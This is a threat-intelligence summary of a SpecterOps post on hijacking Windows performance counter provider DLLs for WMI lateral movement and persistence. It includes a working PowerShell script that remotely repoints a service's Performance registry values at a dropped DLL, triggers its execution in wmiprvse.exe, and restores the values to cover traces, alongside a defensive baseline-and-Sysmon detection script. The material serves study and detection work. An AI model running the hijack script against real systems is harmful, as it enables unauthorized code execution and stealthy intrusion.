| property | value |
|---|---|
| tags | lateral-movement,offensive-tradecraft |
| url | |
| original_word_count | 1925 |
Article Excerpt
Windows offers tons of useful tools that administrators can leverage to perform their daily jobs. A lot of times, those tools are looked at from an offensive standpoint and use cases for them are discovered.
Long Summary
Windows offers a variety of tools that administrators use to perform their daily tasks. Recently, Lee Christensen noticed that service performance DLLs open up new opportunities for attackers. Windows collects performance data (viewable in Performance Monitor) through performance counter providers, which are registered in the registry under HKLM\SYSTEM\CurrentControlSet\Services\<ServiceName>\Performance. Providers come in two versions: V1 providers are DLLs described by the Library, Open, Collect and Close values of that key, while V2 providers are manifest-based. Microsoft recommends writing V2 providers, but V1 registrations are still honoured.
Weaponizing a V1 provider takes three steps: drop a DLL on the target, point the Library value at it, and set the Open, Collect and Close values to the names of the DLL's exported functions. Collection can then be triggered through .NET or WMI. The System.Diagnostics namespace (for example the PerformanceCounter class) reads performance data directly, and WMI exposes it through the Win32_PerfRawData and Win32_PerfFormattedData classes; querying either causes the registered provider DLL to be loaded and its exports to run, in the WMI case inside wmiprvse.exe on the queried host.
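The procedure above, written out as an added PowerShell example. This is not code from the SpecterOps post or the tooling it released; it performs the registry writes over WMI (StdRegProv) and triggers collection with a WMI performance query so that both steps use the same remote primitive. Assumptions: local admin on the target, the target service already has a Performance key, the DLL has already been copied to the path given, and the three export names match what the DLL actually exports (the host, service, path and export names are placeholders).

```powershell
# Added example of the V1 performance DLL hijack described above. Not code from
# the SpecterOps post or its released tooling. Host, service, DLL path and
# export names below are assumptions and must be replaced for a real target.
param(
    [string]$Target    = 'host01.corp.local',         # assumed target host
    [string]$Service   = 'ExampleSvc',                # assumed service with a Performance key
    [string]$DllPath   = 'C:\Windows\Temp\perf.dll',  # assumed location of the dropped DLL
    [string]$OpenFn    = 'OpenPerfData',              # assumed export names
    [string]$CollectFn = 'CollectPerfData',
    [string]$CloseFn   = 'ClosePerfData'
)

$HKLM   = [uint32]2147483650                          # HKEY_LOCAL_MACHINE for StdRegProv
$SubKey = "SYSTEM\CurrentControlSet\Services\$Service\Performance"
$cim    = New-CimSession -ComputerName $Target

function Get-RegString([string]$Name) {
    (Invoke-CimMethod -CimSession $cim -ClassName StdRegProv -MethodName GetStringValue `
        -Arguments @{ hDefKey = $HKLM; sSubKeyName = $SubKey; sValueName = $Name }).sValue
}

function Set-RegString([string]$Name, [string]$Value) {
    $r = Invoke-CimMethod -CimSession $cim -ClassName StdRegProv -MethodName SetStringValue `
        -Arguments @{ hDefKey = $HKLM; sSubKeyName = $SubKey; sValueName = $Name; sValue = $Value }
    if ($r.ReturnValue -ne 0) { throw "SetStringValue '$Name' failed with $($r.ReturnValue)" }
}

# 1. Record the legitimate provider registration so it can be restored afterwards.
$backup = @{}
foreach ($n in 'Library', 'Open', 'Collect', 'Close') { $backup[$n] = Get-RegString $n }

# 2. Repoint the V1 provider at the dropped DLL and its exports.
Set-RegString 'Library' $DllPath
Set-RegString 'Open'    $OpenFn
Set-RegString 'Collect' $CollectFn
Set-RegString 'Close'   $CloseFn

# 3. Trigger a collection remotely. Per the post, wmiprvse.exe on the target
#    enumerates the registered providers when serving a performance query, so
#    the Library is loaded and its Open/Collect exports run inside wmiprvse.exe.
Get-CimInstance -CimSession $cim -ClassName Win32_PerfRawData_PerfOS_System | Out-Null

# 4. Put the original values back. Alternatively, `lodctr /R` on the target
#    rebuilds the counter registrations from the backup store.
foreach ($n in $backup.Keys) { Set-RegString $n $backup[$n] }
Remove-CimSession $cim
```

Step 3 is the lateral movement primitive: nothing but WMI traffic reaches the target, and the DLL executes in a Microsoft-signed host process. Step 4 matters operationally as well as for cleanup, because a provider that is left broken generates the collection errors discussed below.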
If the hijacked provider does not return data in the format Windows expects, the collection fails and errors are logged (Perflib writes them to the Application event log). Windows ships lodctr.exe, which can rebuild broken performance counter registrations (for example with lodctr /R) if this ever becomes a problem. Additionally, performance counters can be created and registered with Performance Monitor by hand, which could offer further persistence opportunities or additional services to hijack for lateral movement.
Detecting malicious use of performance data is prone to false positives and requires a good baseline of the WMI activity in an environment. Because wmiprvse.exe enumerates all of the V1 and V2 registrations when it serves a performance query, it loads every registered provider DLL; the indicators to look for are therefore a DLL loaded by wmiprvse.exe from an unexpected path, and changes to the Library, Open, Collect or Close values of a service's Performance key.
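The two detection ideas above (a registry baseline and wmiprvse.exe image loads), as an added PowerShell example for the defensive side. It is not code from the SpecterOps post or its tooling. It snapshots every service's Performance key, diffs later runs against that baseline, and, if Sysmon is installed, pulls Event ID 7 (ImageLoaded) records where wmiprvse.exe loaded a DLL from outside %SystemRoot%. The baseline file location and the 24-hour window are assumptions.

```powershell
# Added detection example. Not code from the SpecterOps post or its tooling.
# Assumes read access to HKLM (any interactive admin) and, for the image-load
# check, Sysmon logging Event ID 7. Baseline path and window are assumptions.
$BaselinePath = "$env:ProgramData\perf-provider-baseline.json"   # assumed location
$ServicesRoot = 'HKLM:\SYSTEM\CurrentControlSet\Services'

# Enumerate every V1 provider registration: the four values the hijack rewrites.
function Get-PerfProviders {
    Get-ChildItem -Path $ServicesRoot -ErrorAction SilentlyContinue | ForEach-Object {
        $perf = Join-Path $_.PSPath 'Performance'
        if (Test-Path $perf) {
            $p = Get-ItemProperty -Path $perf
            [pscustomobject]@{
                Service = $_.PSChildName
                Library = $p.Library
                Open    = $p.Open
                Collect = $p.Collect
                Close   = $p.Close
            }
        }
    }
}

# First run writes the baseline; later runs report new or changed registrations
# and any Library that resolves to a path outside %SystemRoot%.
function Compare-PerfBaseline {
    $current = @(Get-PerfProviders)
    if (-not (Test-Path $BaselinePath)) {
        $current | ConvertTo-Json | Set-Content -Path $BaselinePath
        Write-Host "Baseline written to $BaselinePath ($($current.Count) providers)"
        return
    }
    $old = @{}
    foreach ($b in (Get-Content $BaselinePath -Raw | ConvertFrom-Json)) { $old[$b.Service] = $b }
    foreach ($c in $current) {
        if ($c.Library) {
            $lib = [Environment]::ExpandEnvironmentVariables($c.Library)
            # A bare file name is resolved from System32; a full path elsewhere is suspicious.
            if ($lib -match '[\\/]' -and -not $lib.StartsWith($env:SystemRoot, 'OrdinalIgnoreCase')) {
                "SUSPICIOUS PATH $($c.Service): Library = $lib"
            }
        }
        $b = $old[$c.Service]
        if (-not $b) { "NEW $($c.Service): Library = $($c.Library)"; continue }
        foreach ($f in 'Library', 'Open', 'Collect', 'Close') {
            if ($c.$f -ne $b.$f) { "CHANGED $($c.Service).$f : '$($b.$f)' -> '$($c.$f)'" }
        }
    }
}

# Sysmon Event ID 7 (ImageLoaded): wmiprvse.exe loading a DLL from outside %SystemRoot%.
function Get-SuspiciousWmiPrvSeLoads {
    param([int]$Hours = 24)
    $filter = @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 7
                 StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $d = @{}
        foreach ($e in ([xml]$_.ToXml()).Event.EventData.Data) { $d[$e.Name] = $e.'#text' }
        if ($d.Image -like '*\WmiPrvSE.exe' -and $d.ImageLoaded -notlike "$env:SystemRoot\*") {
            [pscustomobject]@{ Time = $_.TimeCreated; Loaded = $d.ImageLoaded; Signed = $d.Signed }
        }
    }
}

Compare-PerfBaseline
Get-SuspiciousWmiPrvSeLoads
```

Run it once on a known-good host to seed the baseline, then on a schedule; the baseline diff catches the hijack at the registry write, and the Sysmon query catches it at execution time even if the key was restored afterwards. Third-party software does register legitimate providers outside System32, so expect some tuning, which is the false-positive risk the summary warns about.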
Overall, Performance Monitor offers attackers some interesting ways to extend their lateral movement or persistence options by hijacking a service's performance DLL. With this, attackers gain a novel WMI lateral movement primitive, and there is potential for further discoveries. Tooling demonstrating the proof of concept has been released on GitHub. Defenders should consider how to detect malicious use of performance data in their environments.
Short Summary
Performance, Diagnostics, and WMI

- Windows offers administrators many useful tools for their daily tasks, and those tools are often examined from an offensive standpoint.
- Lee Christensen discovered the potential of service performance DLLs.
- Windows collects performance data through providers registered in the registry, either V1 (DLL-based) or V2 (manifest-based).
- Weaponizing it means dropping a DLL and updating the Library, Open, Collect and Close registry values.
- .NET (System.Diagnostics) and WMI can trigger collection and thereby execute the DLL.
- Windows provides lodctr.exe to repair broken performance counters.
- Performance counters can be manually created and registered, which offers further opportunities.
- Detection requires a good baseline of WMI activity and is prone to false positives.
- wmiprvse.exe loads every registered provider DLL, so a load from an unexpected path is the indicator.
- Performance Monitor gives attackers a lateral movement and persistence primitive that warrants defensive attention.
Source link: https://posts.specterops.io/performance-diagnostics-and-wmi-21f3e01790d3
Summarized content: https://hut.threathunterz.com/battlefield-intel/articles-and-reports/performance-diagnostics-and-wmi
#WindowsTools #PerformanceDLLs #RegistryValues #LateralMovement #MaliciousActivity